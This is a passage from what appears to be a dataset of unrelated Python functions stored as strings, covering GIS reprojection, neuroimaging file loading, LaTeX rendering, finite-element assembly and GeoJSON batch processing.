out_driver.CreateDataSource(output)\n out_layer = out_dsn.CreateLayer(in_layer.GetName(),\n geom_type=in_layer.GetGeomType())\n\n # add fields\n for i in range(0, in_feature_definition.GetFieldCount()):\n fieldDefn = in_feature_definition.GetFieldDefn(i)\n out_layer.CreateField(fieldDefn)\n\n # get the output layer's feature definition\n out_feature_definition = out_layer.GetLayerDefn()\n\n # loop through the input features\n inFeature = in_layer.GetNextFeature()\n while inFeature:\n # get the input geometry\n geom = inFeature.GetGeometryRef().Clone()\n # reproject the geometry\n geom.Transform(coordTrans)\n # create a new feature\n outFeature = ogr.Feature(out_feature_definition)\n # set the geometry and attribute\n outFeature.SetGeometry(geom)\n for i in range(0, out_feature_definition.GetFieldCount()):\n outFeature.SetField(out_feature_definition.GetFieldDefn(i).GetNameRef(), 
inFeature.GetField(i))\n # add the feature to the shapefile\n out_layer.CreateFeature(outFeature)\n # destroy the features and get the next input feature\n outFeature.Destroy()\n inFeature.Destroy()\n inFeature = in_layer.GetNextFeature()\n\n # close the shapefiles\n in_dsn.Destroy()\n out_dsn.Destroy()", "def Map(context, funcname, *nodesets):\n (prefix, local) = ExpandQName(funcname, namespaces=context.processorNss)\n func = (g_extFunctions.get(expanded) or\n CoreFunctions.CoreFunctions.get(expanded, None))\n if not func:\n raise Exception('Dynamically invoked function %s not found.'%funcname)\n flist = [f]*len(nodesets)\n lf = lambda x, f, *args: apply(f, args)\n retlist = apply(map, (lf, flist) + nodesets)\n\n proc = context.processor\n result_nodeset = []\n for ret in retlist:\n proc.pushResult()\n proc.writers[-1].text(Conversions.StringValue(ret))\n frag = proc.popResult()\n context.rtfs.append(frag)\n result_nodeset.append(frag.childNodes[0])\n return result_nodeset", "def buildFunc(self, parFiles):\n imageMatrix = None\n affine = None\n TR = None\n\n ### Loop over all of the par files\n nVols = len(parFiles)\n for par_fname in parFiles:\n # build full path to this par file\n par_fname = join(self.seriesDir, par_fname)\n\n # make sure there is a corresponding .rec file\n if not os.path.isfile(par_fname.replace('.par', '.rec')):\n print('No REC file found to match par: {}', par_fname)\n\n ### Build the 3d voxel array for this volume and reorder to RAS+\n # nibabel will load the par/rec, but there can be multiple images\n # (mag, phase, etc...) concatenated into the 4th dimension. Loading\n # with the strict_sort option (I think) will make sure the first\n # image is the data we want. Extract this data, then reorder the\n # voxel array to RAS+\n thisVol = nib.load(par_fname, strict_sort=True)\n\n # get the vol index (0-based index) from the acq_nr field of the\n # header (1-based index)\n volIdx = int(thisVol.header.general_info['acq_nr']) - 1\n\n # set TR\n if TR is None:\n TR = thisVol.header.general_info['repetition_time'][0]\n\n # convert to RAS+\n thisVol_RAS = nib.as_closest_canonical(thisVol)\n\n # construct the imageMatrix if it hasn't been made yet\n if imageMatrix is None:\n imageMatrix = np.zeros(shape=(thisVol_RAS.shape[0],\n thisVol_RAS.shape[1],\n thisVol_RAS.shape[2],\n nVols), dtype=np.uint16)\n\n # construct the affine if it isn't made yet\n if affine is None:\n affine = thisVol_RAS.affine\n\n # Add this data to the image matrix\n imageMatrix[:, :, :, volIdx] = thisVol_RAS.get_fdata()[:, :, :, 0].astype('uint16')\n\n ### Build a Nifti object\n funcImage = nib.Nifti1Image(imageMatrix, affine=affine)\n\n # add the correct TR to the header\n pixDims = np.array(funcImage.header.get_zooms())\n pixDims[3] = TR\n funcImage.header.set_zooms(pixDims)\n\n return funcImage", "def map_func(h, configs, args):\n\tif args.verbose:\n\t\tcmd = \"python {} -i {}/threshold{}.tif -o {}/threshold{}.shp -v\".format(\n\t\t\tconfigs[\"path\"][\"polygons\"],\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th,\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th\n\t\t)\n\t\tprint cmd\n\telse:\n\t\tcmd = \"python {} -i {}/threshold{}.tif -o {}/threshold{}.shp\".format(\n\t\t\tconfigs[\"path\"][\"polygons\"],\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th,\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th\n\t\t)\n\tcmd_args = shlex.split(cmd)\n\tstdout,stderr = sp.Popen(\n\t\tcmd_args,\n\t\tstdin = sp.PIPE,\n\t\tstdout = sp.PIPE,\n\t\tstderr = sp.PIPE\n\t).communicate()\n\tif args.verbose:\n\t\tprint 
stdout, stderr\n\treturn True", "def main(path):\n vm_files = []\n if not os.path.exists(path):\n print(\"Error: File or directory does not exist: %s\"\n % path)\n return\n\n elif os.path.isdir(path): # Directory of files\n vm_files = filter_paths(path)\n dir_path = path\n file_name = os.path.basename(path) + FILE_EXTENSION_ASM\n if not vm_files: # no vm files found\n print(\"Error: No files matching %s found in supplied \"\n \"directory: %s\" % (FILE_EXTENSION_VM, path))\n return\n\n elif os.path.isfile(path): # Single file\n if not path.endswith(FILE_EXTENSION_VM):\n print(\"Error: Mismatched file type.\\n\\\"%s\\\"suffix is not a valid \"\n \"file type. Please supply .vm filename or dir.\" % path)\n return\n vm_files.append(path)\n dir_path = os.path.dirname(path)\n file_name = os.path.splitext(os.path.basename(path))[0] + \\\n FILE_EXTENSION_ASM\n\n else:\n print(\"Error: Unrecognized path: \\\"%s\\\"\\n\"\n \"Please supply dir or path/filename.vm\")\n return\n\n try:\n # Initilizes write based, using a condition for multiple file reading.\n # Multiple files have a special initlization\n writer = CodeWriter(os.path.join(dir_path, file_name),\n len(vm_files) > 1)\n for vm_file in vm_files:\n translate_file(vm_file, writer)\n writer.close()\n\n except OSError:\n print(\"Could not open some file.\\n \"\n \"If file exists, check spelling of file path.\")\n return\n\n except Exception as e:\n print(\"Some exception occurred while parsing.\", e)\n traceback.print_exc()\n return", "def addfunctions(dtls, bunchdt):\n snames = [\n \"BuildingSurface:Detailed\",\n \"Wall:Detailed\",\n \"RoofCeiling:Detailed\",\n \"Floor:Detailed\",\n \"FenestrationSurface:Detailed\",\n \"Shading:Site:Detailed\",\n \"Shading:Building:Detailed\",\n \"Shading:Zone:Detailed\",\n ]\n for sname in snames:\n if sname.upper() in bunchdt:\n surfaces = bunchdt[sname.upper()]\n for surface in surfaces:\n func_dict = {\n \"area\": fh.area,\n \"height\": fh.height, # not working correctly\n \"width\": fh.width, # not working correctly\n \"azimuth\": fh.azimuth,\n \"tilt\": fh.tilt,\n \"coords\": fh.getcoords, # needed for debugging\n }\n try:\n surface.__functions.update(func_dict)\n except KeyError as e:\n surface.__functions = func_dict\n # add common functions\n # for name in dtls:\n # for idfobject in bunchdt[name]:\n # idfobject.__functions\n # idfobject['__functions']['fieldnames'] = fieldnames\n # idfobject['__functions']['fieldvalues'] = fieldvalues\n # idfobject['__functions']['getrange'] = GetRange(idfobject)\n # idfobject['__functions']['checkrange'] = CheckRange(idfobject)", "def main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', help='Input .py file', nargs='+')\n args = parser.parse_args()\n\n mod_func = []\n\n for pyfile in args.input:\n tree = ast.parse(open(pyfile).read())\n\n methods = sorted({node.name for node in ast.walk(tree)\n if isinstance(node, ast.FunctionDef)})\n mod_func.extend([[pyfile, methods[i]] for i in range(len(methods))])\n\n write_csv(\"meth_func.csv\", mod_func)", "def transform(self, *fs):\n return transform(self, *fs)", "def get_vulnerability_functions_04(fname):\n categories = dict(assetCategory=set(), lossCategory=set(),\n vulnerabilitySetID=set())\n imts = set()\n taxonomies = set()\n vf_dict = {} # imt, taxonomy -> vulnerability function\n for vset in nrml.read(fname).vulnerabilityModel:\n categories['assetCategory'].add(vset['assetCategory'])\n categories['lossCategory'].add(vset['lossCategory'])\n 
categories['vulnerabilitySetID'].add(vset['vulnerabilitySetID'])\n IML = vset.IML\n imt_str = IML['IMT']\n imls = ~IML\n imts.add(imt_str)\n for vfun in vset.getnodes('discreteVulnerability'):\n taxonomy = vfun['vulnerabilityFunctionID']\n if taxonomy in taxonomies:\n raise InvalidFile(\n 'Duplicated vulnerabilityFunctionID: %s: %s, line %d' %\n (taxonomy, fname, vfun.lineno))\n taxonomies.add(taxonomy)\n with context(fname, vfun):\n loss_ratios = ~vfun.lossRatio\n coefficients = ~vfun.coefficientsVariation\n if len(loss_ratios) != len(imls):\n raise InvalidFile(\n 'There are %d loss ratios, but %d imls: %s, line %d' %\n (len(loss_ratios), len(imls), fname,\n vfun.lossRatio.lineno))\n if len(coefficients) != len(imls):\n raise InvalidFile(\n 'There are %d coefficients, but %d imls: %s, line %d' %\n (len(coefficients), len(imls), fname,\n vfun.coefficientsVariation.lineno))\n with context(fname, vfun):\n vf_dict[imt_str, taxonomy] = scientific.VulnerabilityFunction(\n taxonomy, imt_str, imls, loss_ratios, coefficients,\n vfun['probabilisticDistribution'])\n categories['id'] = '_'.join(sorted(categories['vulnerabilitySetID']))\n del categories['vulnerabilitySetID']\n return vf_dict, categories", "def define_functions(self):\n\n self.define_vector_functions()\n self.define_scalar_functions()\n\n return None", "def vl2img(vl_json_in, fileformat):\n\n # TODO would prefer to do this properly with pipes\n # using | and shell=True is safe though given no arguments\n executables = {\"svg\": \"vg2svg\", \"png\": \"vg2png\", \"pdf\": \"vg2pdf\"}\n try:\n exe = executables[fileformat]\n except KeyError as e:\n print(e.output)\n try:\n return subprocess.check_output(\"vl2vg | %s\" % exe, shell=True, input=vl_json_in)\n except subprocess.CalledProcessError as e:\n print(e.output)", "def render_function(children):\r\n fname = children[0].latex\r\n if casify(fname) not in functions:\r\n pass # TODO turn unknown function red or give some kind of error\r\n\r\n # Wrap the input of the function with parens or braces.\r\n inner = children[1].latex\r\n if fname == \"sqrt\":\r\n inner = u\"{{{expr}}}\".format(expr=inner)\r\n else:\r\n if children[1].tall:\r\n inner = ur\"\\left({expr}\\right)\".format(expr=inner)\r\n else:\r\n inner = u\"({expr})\".format(expr=inner)\r\n\r\n # Correctly format the name of the function.\r\n if fname == \"sqrt\":\r\n fname = ur\"\\sqrt\"\r\n elif fname == \"log10\":\r\n fname = ur\"\\log_{10}\"\r\n elif fname == \"log2\":\r\n fname = ur\"\\log_2\"\r\n else:\r\n fname = ur\"\\text{{{fname}}}\".format(fname=fname)\r\n\r\n # Put it together.\r\n latex = fname + inner\r\n return LatexRendered(latex, tall=children[1].tall)", "def _zipper(self, func):\n if func not in self.resmap:\n return []\n return itertools.chain(*[f(self.blob.get(name, None), self.filepath, self.tree, self.conn, self.dbpath)\n for name, f in self.resmap[func]])", "def process(self, file_list, shapefiles_dir, output_dir):\n for datatype in self.data_types:\n for data_file in file_list:\n data_file = str(data_file)\n original_filename = os.path.basename(data_file)\n cut_fname = original_filename[:len(self.date_format)+2]\n observation_date = datetime.strptime(cut_fname, self.date_format).strftime('%Y%m%d')\n try:\n input_file = HE5(self.data_directory, original_filename)\n if ('nc4' in data_file):\n input_file = NC4(self.data_directory, original_filename)\n data = input_file.read(datatype.ds_name)\n except Exception as e:\n print(e)\n continue\n\n rasterdata = input_file.genTif(data, datatype.resolution)\n\n for 
shpfile in Path(shapefiles_dir).rglob('*.shp'):\n shapefile = Shapefile(shapefiles_dir, shpfile.name)\n csvfile = shapefile.read_shape_file(datatype, rasterdata, data, self.minVal)\n csvfile = np.array(csvfile)\n\n output = OutputFile(output_dir, shapefile.getDirName(), self.name, datatype, observation_date)\n output.save(csvfile)\n\n del rasterdata", "def create_test_function(source, output, lang):\n with open(source) as f:\n snippet = f.read()\n with open(output) as f:\n res = f.read()\n\n def tst_func(slf):\n slf.do(snippet, res, lang=lang)\n\n return tst_func", "def main(config_file, rows, cols):\n # setup paths\n _, _, params = cf.get_ifg_paths(config_file)\n _postprocess_linrate(rows, cols, params)\n if params[cf.TIME_SERIES_CAL]:\n _postprocess_timeseries(rows, cols, params)", "def convert(self):\n \n vrtlist = sorted(glob.glob(self.fullPath + '/*vrt'))\n splitAt = len(self.fullPath) + 1\n \n if len(vrtlist)!=0:\n for i in range(0,len(vrtlist)):\n prefix = str(vrtlist[i].split(\".vrt\")[0])\n prefix = prefix[:splitAt] + 'full' + prefix[splitAt:]\n ct = pymodis.convertmodis_gdal.convertModisGDAL(hdfname = vrtlist[i], \n prefix = prefix, subset = self.subset, res = self.resolution, \n outformat = self.outformat, wkt = self.projection, resampl = 'NEAREST_NEIGHBOR', vrt = True)\n ct.run()\n mosdel = glob.glob(self.fullPath + '/*mos.tif')\n for f in mosdel:\n os.remove(f)\n xmldel = glob.glob(self.fullPath + '/*mos.tif.xml') \n for f in xmldel:\n os.remove(f)\n vrtdel = glob.glob(self.fullPath + '/*.vrt')\n for f in vrtdel:\n os.remove(f)\n tifCount = len(glob.glob(self.fullPath + '/*.tif'))\n dataCount = self.subset.count('1')\n logger.log('SUCCESS', 'Conversion complete! The %d bands of %d mosaicked images were successfully converted to %d %s files.' % (dataCount, len(vrtlist), tifCount, str(self.outformat)))\n \n \n if len(vrtlist)==0: \n \n hdflist = sorted(glob.glob(self.fullPath + '/*.hdf'))\n for i in range(len(hdflist)):\n ms = pymodis.convertmodis_gdal.createMosaicGDAL(hdfnames = [hdflist[i]], subset = self.subset, outformat = 'GTiff')\n ms.run(str(hdflist[i].split('.h')[0]) + 'mos.tif')\n ms.write_vrt(output = str(hdflist[i].split('.h')[0]), separate = True)\n\n vrtlist = sorted(glob.glob(self.fullPath + '/*vrt'))\n splitAt = len(self.fullPath) + 1\n \n for i in range(0,len(vrtlist)):\n prefix = str(vrtlist[i].split(\".vrt\")[0])\n prefix = prefix[:splitAt] + 'full' + prefix[splitAt:]\n ct = pymodis.convertmodis_gdal.convertModisGDAL(hdfname = vrtlist[i], \n prefix = prefix, subset = self.subset, res = self.resolution, \n outformat = self.outformat, wkt = self.projection, resampl = 'NEAREST_NEIGHBOR', vrt = True)\n ct.run()\n \n mosdel = glob.glob(self.fullPath + '/*mos.tif')\n for f in mosdel:\n os.remove(f)\n xmldel = glob.glob(self.fullPath + '/*mos.tif.xml') \n for f in xmldel:\n os.remove(f)\n vrtdel = glob.glob(self.fullPath + '/*.vrt')\n for f in vrtdel:\n os.remove(f)\n tifCount = len(glob.glob(self.fullPath + '/full*.tif'))\n dataCount = self.subset.count('1')\n logger.log('SUCCESS', 'Conversion complete! The %d bands of %d HDF files were successfully converted to %d %s files.' 
% (dataCount, len(hdflist), tifCount, str(self.outformat)))", "def function_closure(functions, casify):\r\n def render_function(children):\r\n \"\"\"\r\n Escape function names and give proper formatting to exceptions.\r\n\r\n The exceptions being 'sqrt', 'log2', and 'log10' as of now.\r\n \"\"\"\r\n fname = children[0].latex\r\n if casify(fname) not in functions:\r\n pass # TODO turn unknown function red or give some kind of error\r\n\r\n # Wrap the input of the function with parens or braces.\r\n inner = children[1].latex\r\n if fname == \"sqrt\":\r\n inner = u\"{{{expr}}}\".format(expr=inner)\r\n else:\r\n if children[1].tall:\r\n inner = ur\"\\left({expr}\\right)\".format(expr=inner)\r\n else:\r\n inner = u\"({expr})\".format(expr=inner)\r\n\r\n # Correctly format the name of the function.\r\n if fname == \"sqrt\":\r\n fname = ur\"\\sqrt\"\r\n elif fname == \"log10\":\r\n fname = ur\"\\log_{10}\"\r\n elif fname == \"log2\":\r\n fname = ur\"\\log_2\"\r\n else:\r\n fname = ur\"\\text{{{fname}}}\".format(fname=fname)\r\n\r\n # Put it together.\r\n latex = fname + inner\r\n return LatexRendered(latex, tall=children[1].tall)\r\n # Return the function within the closure.\r\n return render_function", "def generic_function(self, node, ordered_functions):\n for generic in node.fortran_generic:\n new = node.clone()\n ordered_functions.append(new)\n self.append_function_index(new)\n new._generated = \"fortran_generic\"\n fmt = new.fmtdict\n # XXX append to existing suffix\n if generic.fmtdict:\n fmt.update(generic.fmtdict)\n fmt.function_suffix = fmt.function_suffix + generic.function_suffix\n new.fortran_generic = {}\n new.wrap.assign(fortran=True)\n new.ast.declarator.params = generic.decls\n\n # Try to call original C function if possible.\n # All arguments are native scalar.\n need_wrapper = False\n if new.ast.declarator.is_indirect():\n need_wrapper = True\n \n for arg in new.ast.declarator.params:\n if arg.declarator.is_indirect():\n need_wrapper = True\n break\n elif arg.typemap.sgroup == \"native\":\n pass\n else:\n need_wrapper = True\n break\n\n if need_wrapper:\n # The C wrapper is required to cast constants.\n # generic.yaml: GenericReal\n new.C_force_wrapper = True\n new.wrap.c = True\n new._PTR_C_CXX_index = node._function_index\n else:\n new._PTR_F_C_index = node._function_index\n \n # Do not process templated node, instead process\n # generated functions above.\n # node.wrap.c = False\n node.wrap.fortran = False", "def _run_file_contents(contents: dict, strict_fn, debug_print):\n\n default_fns_args = {\n \"adjust_focus\": {\"on\": \"hexbin\"},\n \"adjust_positioning\": True,\n \"adjust_opacity\": True\n }\n\n input_fns = contents.pop(\"functions\", {})\n for k, v in default_fns_args.items():\n if k not in input_fns:\n input_fns[k] = v\n\n output = contents.pop(\"output\", False)\n display = contents.pop(\"display\", True)\n builder = PlotBuilder.builder_from_dict(**contents)\n debug_print(\"* all layers loaded\")\n\n for k, v in input_fns.items():\n if v:\n args, kwargs = parse_args_kwargs(v)\n try:\n _fn_map[k](builder, *args, **kwargs)\n debug_print(f\"* invoked function '{_fn_map[k].__name__}'.\\nargs: {args}\\nkwargs: {kwargs}\")\n except Exception as e:\n try:\n debug_print(f\"* error while performing '{_fn_map[k].__name__}'.\\nerror: {e}\")\n strict_fn(e)\n except KeyError as f:\n debug_print(f\"* no such function as '{k}'.\")\n strict_fn(f)\n\n builder.finalize(raise_errors=False)\n\n if output:\n args, kwargs = parse_args_kwargs(output)\n builder.output(*args, **kwargs)\n 
debug_print(\"* figure output.\")\n\n if display:\n args, kwargs = parse_args_kwargs(display)\n builder.display(*args, **kwargs)\n debug_print(\"* figure displayed.\")\n\n return builder.get_plot_status()", "def main():\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(dest='INFILE')\r\n parser.add_argument(dest='OUTFILE')\r\n\r\n args = parser.parse_args()\r\n function1(args.INFILE, args.OUTFILE)", "def apply_function_vector(function_vector, x_vector):\n function_index = 0\n element_index = 1\n \n def d():\n for e in zip(function_vector, x_vector):\n print(e[1])\n d()\n \n return list(map(lambda fx_set: fx_set[function_index](fx_set[element_index]), zip(function_vector, x_vector)))", "def use_vectors(*funcs):\n\n global GLOBAL_STATUS\n if funcs:\n GLOBAL_STATUS.discard('ARRAYS')\n GLOBAL_STATUS.add('VECTORS')\n GLOBAL_STATUS.discard('SCALARS')\n else:\n GLOBAL_STATUS.discard('ARRAYS')\n GLOBAL_STATUS.discard('VECTORS')\n GLOBAL_STATUS.discard('SCALARS')\n\n for name in _get_func_names(funcs):\n if ('scalar' not in name and 'vector' not in name\n and 'array' not in name):\n globals()[name] = globals()[name].vector", "def convert(func, overload_module, transformers):\n source, _ = parsing.parse_entity(func)\n entity_info = transformer.EntityInfo(\n source_code=source,\n source_file='<fragment>',\n namespace={},\n arg_values=None,\n arg_types={},\n owner_type=None)\n\n overload_module.PyctrReturnException = PyctrReturnException\n\n namer = naming.Namer(entity_info.namespace)\n ctx = transformer.EntityContext(namer, entity_info)\n overload_name = ctx.namer.new_symbol('overload', set())\n overload = config.VirtualizationConfig(overload_module, overload_name)\n\n source = _transform(source, ctx, overload, transformers)\n gen_func = _wrap_in_generator(func, source, namer, overload)\n gen_func = _attach_closure(func, gen_func)\n return gen_func", "def load_raw_wignetting_function():\n global rawvignfun\n if rawvignfun is None:\n vignfile = get_vigneting_by_urd(28)\n x = 23.5 + np.tan(vignfile[\"Offset angles\"].data[\"X\"]*pi/180/60.)*F/DL\n y = 23.5 + np.tan(vignfile[\"Offset angles\"].data[\"Y\"]*pi/180/60.)*F/DL\n rawvignfun = RegularGridInterpolator((vignfile[\"5 arcmin PSF\"].data[\"E\"], x, y), vignfile[\"5 arcmin PSF\"].data[\"EFFAREA\"])\n return rawvignfun", "def main():\r\n\r\n #Create a list of all files that have the GPX file format\r\n fileList = glob.glob(os.path.join(inFolder,\"*.{0}\".format(inFormat)))\r\n\r\n #Create a connection to PostGIS database\r\n pgConn = createPostgisConnection(dbFormat, dbHost, dbName, dbSchema, dbUser, dbPWD)\r\n\r\n #Process each *listed* layer type from a GPS file\r\n for f in fileList:\r\n importGPX(f, gpxImportLayers, pgConn)", "def main(file):\n\n # Get the current working directory.\n here = os.getcwd()\n #Need the file_name to set globe, so that other functions can access to it.\n global file_name\n # Spite the Input into file_path and file_name.\n file_path = spilt_path(file)[0]\n file_name = spilt_path(file)[1]\n\n # Try to get into the file_path, if exist\n try:\n os.chdir(file_path)\n except IOError, e:\n print e\n\n # Now convert it\n convertFile(file_name)\n # going back to orgin folder\n os.chdir(here)\n return os.path.join(output_dir, file_name)", "def input(self, *args, **kwargs):\n return lambda wildcards: self.samples.map(*args, file=\"samples/all/runs/{sample_run}/samples.csv\", **wildcards, **kwargs)", "def process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = 
[]\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n # use the func to insert data from these files to database's fact and dim tables\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))", "def assemble_eval(\n fenics_function: Callable,\n fenics_templates: Iterable[FenicsVariable],\n *args: np.array,\n) -> Tuple[np.array, ufl.Form, Tuple[FenicsVariable]]:\n\n check_input(fenics_templates, *args)\n fenics_inputs = convert_all_to_fenics(fenics_templates, *args)\n\n out = fenics_function(*fenics_inputs)\n if not isinstance(out, tuple):\n raise ValueError(\n \"FEniCS function output should be in the form (assembly_output, ufl_form).\"\n )\n\n assembly_output, ufl_form = out\n\n if isinstance(assembly_output, tuple):\n raise ValueError(\n \"Only single solution output from FEniCS function is supported.\"\n )\n\n if not isinstance(assembly_output, float):\n raise ValueError(\n f\"FEniCS function output should be in the form (assembly_output, ufl_form). Got {type(assembly_output)} instead of float\"\n )\n\n if not isinstance(ufl_form, ufl.Form):\n raise ValueError(\n f\"FEniCS function output should be in the form (assembly_output, ufl_form). Got {type(ufl_form)} instead of ufl.Form\"\n )\n\n numpy_output = np.asarray(assembly_output)\n return numpy_output, ufl_form, fenics_inputs", "def load_viewpoints(viewpoint_file_list):\n\n if isinstance(viewpoint_file_list, str):\n vp_file_list = [viewpoint_file_list]\n\n try:\n vp_file_list = iter(viewpoint_file_list)\n except TypeError:\n print(\"viewpoint_file_list is not an iterable object\")\n\n for vp_file in vp_file_list:\n yield load_viewpoint(vp_file)", "def apply_funcs(self, src_dir, pkl_name, dest_dir, funclist):\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n pkl_files = os.listdir(src_dir)\n data_in = open(os.path.join(src_dir, pkl_name), 'rb')\n data_array = pickle.load(data_in)\n dump_array = []\n for i, data_dict in enumerate(data_array):\n new_data_dict = self.dutils.apply_flist(data_dict, funclist, w_rosdict=True)\n if new_data_dict.get(\"flag\", True):\n dump_array.append(new_data_dict)\n new_pkl_name = pkl_name\n dump_path = os.path.join(dest_dir, new_pkl_name)\n self.pickledump(dump_array, dump_path)\n self.seen_pkls.append(new_pkl_name)\n return new_pkl_name", "def write_triggers_to_file(triggerfile, functionfile,\n generators, entityname, table, path, select,\n indextable, index):\n for generator in generators:\n gen = generator(entityname, table, path, select, indextable, index)\n functionfile.write(gen.function)\n triggerfile.write(gen.trigger)", "def jvp_assemble_eval(\n fenics_function: Callable,\n fenics_templates: Iterable[FenicsVariable],\n primals: Tuple[np.array],\n tangents: Tuple[np.array],\n) -> Tuple[np.array]:\n\n numpy_output_primal, output_primal_form, fenics_primals = assemble_eval(\n fenics_function, fenics_templates, *primals\n )\n\n # Now tangent evaluation!\n fenics_tangents = convert_all_to_fenics(fenics_primals, *tangents)\n output_tangent_form = 0.0\n for fp, ft in zip(fenics_primals, fenics_tangents):\n output_tangent_form += fenics.derivative(output_primal_form, fp, ft)\n\n if not isinstance(output_tangent_form, float):\n output_tangent_form = 
ufl.algorithms.expand_derivatives(output_tangent_form)\n output_tangent = fenics.assemble(output_tangent_form)\n\n jax_output_tangent = output_tangent\n\n return numpy_output_primal, jax_output_tangent", "def process_svgs(model_info, directory, output, allow_missing=False):\n r2dt.write(model_info, directory, output, allow_missing=allow_missing)", "def transform_regions(region_list, wcs_in, wcs_out, preroot,\n reg_format='fits', clobber=False):\n\n if reg_format == 'ascii':\n func = transform_region_ascii\n elif reg_format == 'fits':\n func = transform_region_fits\n else:\n raise ValueError(\"Unsupported reg_format=\" + reg_format)\n\n outfiles = []\n for region_file in region_list:\n\n # Do not do anything if the output file already exists and\n # clobber is not set.\n #\n outfile = preroot + region_file\n outfiles.append(outfile)\n if not clobber and os.path.exists(outfile):\n continue\n\n func(region_file, outfile, wcs_in, wcs_out)\n\n return outfiles", "def process(sources, output, force):\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s [%(levelname)s] - %(message)s', datefmt=\"%H:%M:%S\")\n\n logging.getLogger('shapely.geos').setLevel(logging.WARNING)\n logging.getLogger('Fiona').setLevel(logging.WARNING)\n logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)\n requests.packages.urllib3.disable_warnings()\n # logging.getLogger('processing').setLevel(logging.DEBUG)\n\n catalog_features = []\n failures = []\n path_parts_to_skip = utils.get_path_parts(sources).index(\"sources\") + 1\n success = True\n for path in utils.get_files(sources):\n try:\n logging.info(\"Processing \" + path)\n pathparts = utils.get_path_parts(path)[path_parts_to_skip:]\n pathparts[-1] = pathparts[-1].replace('.json', '.geojson')\n\n outdir = os.path.join(output, *pathparts[:-1], pathparts[-1].replace('.geojson', ''))\n outfile = os.path.join(output, *pathparts)\n\n source = utils.read_json(path)\n urlfile = urlparse(source['url']).path.split('/')[-1]\n \n if not hasattr(adapters, source['filetype']):\n logging.error('Unknown filetype ' + source['filetype'])\n failures.append(path)\n continue\n \n read_existing = False\n if os.path.isfile(outfile):\n logging.info(\"Output file exists\")\n if os.path.getmtime(outfile) > os.path.getmtime(path):\n logging.info(\"Output file is up to date\")\n if not force:\n read_existing = True\n logging.warning('Skipping ' + path + ' since generated file exists. 
Use --force to regenerate.') \n else:\n logging.info(\"Output is outdated, {} < {}\".format(\n datetime.datetime.fromtimestamp(os.path.getmtime(outfile)),\n datetime.datetime.fromtimestamp(os.path.getmtime(path))))\n\n if read_existing:\n with open(outfile, \"rb\") as f:\n geojson = json.load(f)\n properties = geojson['properties']\n else:\n logging.info('Downloading ' + source['url'])\n \n try:\n fp = utils.download(source['url'])\n except IOError:\n logging.error('Failed to download ' + source['url'])\n failures.append(path)\n continue\n \n logging.info('Reading ' + urlfile)\n \n if 'filter' in source:\n filterer = BasicFilterer(source['filter'], source.get('filterOperator', 'and'))\n else:\n filterer = None\n \n try:\n geojson = getattr(adapters, source['filetype'])\\\n .read(fp, source['properties'],\n filterer=filterer,\n layer_name=source.get(\"layerName\", None),\n source_filename=source.get(\"filenameInZip\", None))\n except IOError as e:\n logging.error('Failed to read ' + urlfile + \" \" + str(e))\n failures.append(path)\n continue\n except zipfile.BadZipfile as e:\n logging.error('Unable to open zip file ' + source['url'])\n failures.append(path)\n continue\n finally:\n os.remove(fp.name)\n if(len(geojson['features'])) == 0:\n logging.error(\"Result contained no features for \" + path)\n continue\n excluded_keys = ['filetype', 'url', 'properties', 'filter', 'filenameInZip']\n properties = {k:v for k,v in list(source.items()) if k not in excluded_keys}\n properties['source_url'] = source['url']\n properties['feature_count'] = len(geojson['features'])\n logging.info(\"Generating demo point\")\n properties['demo'] = geoutils.get_demo_point(geojson)\n \n geojson['properties'] = properties\n \n utils.make_sure_path_exists(os.path.dirname(outfile))\n\n #cleanup existing generated files\n if os.path.exists(outdir):\n rmtree(outdir)\n filename_to_match, ext = os.path.splitext(pathparts[-1])\n output_file_dir = os.sep.join(utils.get_path_parts(outfile)[:-1])\n logging.info(\"looking for generated files to delete in \" + output_file_dir)\n for name in os.listdir(output_file_dir):\n base, ext = os.path.splitext(name)\n if base == filename_to_match:\n to_remove = os.path.join(output_file_dir, name)\n logging.info(\"Removing generated file \" + to_remove)\n os.remove(to_remove)\n\n utils.write_json(outfile, geojson)\n\n logging.info(\"Generating label points\")\n label_geojson = geoutils.get_label_points(geojson)\n label_path = outfile.replace('.geojson', '.labels.geojson')\n utils.write_json(label_path, label_geojson)\n\n logging.info('Done. 
Processed to ' + outfile)\n \n if not \"demo\" in properties:\n properties['demo'] = geoutils.get_demo_point(geojson)\n\n properties['path'] = \"/\".join(pathparts)\n catalog_entry = {\n 'type': 'Feature',\n 'properties': properties,\n 'geometry': geoutils.get_union(geojson)\n }\n catalog_features.append(catalog_entry)\n\n if not os.path.exists(outdir) or not os.path.exists(os.path.join(outdir, \"units.json\")):\n logging.info(\"Generated exploded GeoJSON to \" + outdir)\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n # .json instead of .geojson, incase there is a unit named \"source\"\n utils.write_json(os.path.join(outdir, \"source.json\"), catalog_entry) \n units = []\n for feature in geojson['features']:\n feature_id = str(feature['properties']['id'])\n feature_id = feature_id.replace('/', '')\n feature_filename = os.path.join(outdir, feature_id + \".geojson\")\n utils.write_json(feature_filename, feature)\n units.append(feature['properties'])\n utils.write_json(os.path.join(outdir, \"units.json\"), units)\n else:\n logging.debug(\"exploded GeoJSON already exists, not generating\")\n\n except Exception as e:\n logging.error(str(e))\n logging.exception(\"Error processing file \" + path)\n failures.append(path)\n success = False\n\n catalog = {\n 'type': 'FeatureCollection',\n 'features': catalog_features\n }\n utils.write_json(os.path.join(output,'catalog.geojson'), catalog)\n\n if not success:\n logging.error(\"Failed sources: \" + \", \".join(failures))\n sys.exit(-1)", "def _generate_and_save_function(self, filename, expression, parameters):\n\n # check for / create the save folder for this expression\n folder = self.config_folder + '/' + 